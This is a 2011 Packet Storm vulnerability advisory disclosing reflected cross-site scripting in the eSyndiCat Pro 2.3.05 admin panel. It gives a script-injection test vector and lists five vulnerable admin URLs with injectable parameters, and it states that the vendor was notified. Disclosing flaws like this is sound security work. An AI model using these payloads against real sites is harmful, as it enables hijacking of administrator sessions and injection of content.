eSyndiCat Pro 2.3.05 Cross Site Scripting

2011-11-26T00:00:00
ID PACKETSTORM:107324
Type packetstorm
Reporter d3v1l
Modified 2011-11-26T00:00:00

Description

                                        
                                            `################################################################################################  
  
  
# Exploit Title: eSyndiCat Pro v2.3.05 Cross-Site Scripting ( XSS )   
  
# Script Page : http://www.esyndicat.com   
  
# Date: 24:11:2011  
  
# Author : RandomStorm - http://www.randomstorm.com  
  
# Avram Marius Gabriel (d3v1l)  
  
# Tested on: Windows XP & Vista (IE9 - Firefox 8.0)   
  
# Note: Redirect and Html Injection can be performed also   
  
# Vendor has been alerted !  
  
################################################################################################   
  
  
  
# POC:   
  
# Admin Panel   
  
# Vector: "><script>alert('XSS')</script>   
  
# http://www.esyndicat.com/demo/admin/controller.php?file=admins&do=edit&id=XSS  
  
# http://www.esyndicat.com/demo/admin/controller.php?file=blocks&do=edit&id=XSS  
  
# http://www.esyndicat.com/demo/admin/controller.php?plugin=articles&do=edit&id=XSS   
  
# http://www.esyndicat.com/demo/admin/controller.php?file=suggest-category&id=XSS  
  
# http://www.esyndicat.com/demo/admin/controller.php?file=search&_dc=1322239437555&action=get&start=0&limit=10&sort=XSS  
  
# Screenshot: http://i.imgur.com/bsesB.jpg   
  
  
################################################################################################  
  
  
  
  
  
  
  
`